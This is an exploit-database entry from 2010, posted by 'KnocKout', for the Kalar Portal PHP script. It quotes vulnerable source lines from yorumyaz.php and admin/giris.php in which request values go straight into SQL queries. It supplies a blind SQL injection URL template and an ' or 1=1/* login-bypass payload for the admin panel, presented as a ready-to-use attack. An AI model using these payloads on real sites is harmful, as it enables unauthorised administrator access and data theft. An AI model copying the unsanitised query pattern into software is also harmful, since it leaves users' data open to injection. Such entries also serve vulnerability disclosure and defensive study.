Kalar Portal (id) Blindies SQL Injection Vulnerability

2010-08-19T00:00:00
ID 1337DAY-ID-13749
Type zdt
Reporter KnocKout
Modified 2010-08-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================
Kalar Portal (id) Blindies SQL Injection Vulnerability
======================================================


########################################################
Author : KnocKout
Special Thankz: DaiMon, Barcod3.
Contact : [email protected]
##########################################################
Script : Kalar Portal
Download : http://www.fifadelisi.net/downloaddetay-60-Kalar_Portal_Script.html
Demo : http://kalar.ufukali.com
##########################################################

Vulnerable file in yorumyaz.php
################## Error Line ##################
<?php
$yorumla=$_POST['yorumla'];
if(empty($yorumla))
{

include"baglan.php";
$sorguy=mysql_query("select * from yorumlar where idsi='$id' and kategori='$bolumdb' and onay=1 order by id");
$yorumsayi=mysql_num_rows($sorguy);
print"<table align='center' width='100%'><tr><td height='35' width='100' class='koyusiyah'><b>$yorumsayi yorum :</b></td><td><a href='#yrm'><b>Sen de yaz</b></a></td></tr>";
if($yorumsayi>0)
###################################################

Inject to Blind SQL

 http://target.com/path/yorumyaz.php?id=[Blind]
 
##################################################
Vulnerable File in admin/giris.php
###################################################
################### Error Line'z ####################
	$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
###################################################

 Inject to giris.php
  Exploitiez  
  
  id : ' or 1=1/*
  pw : ' or 1=1/*
########################################################



#  0day.today [2018-04-09]  #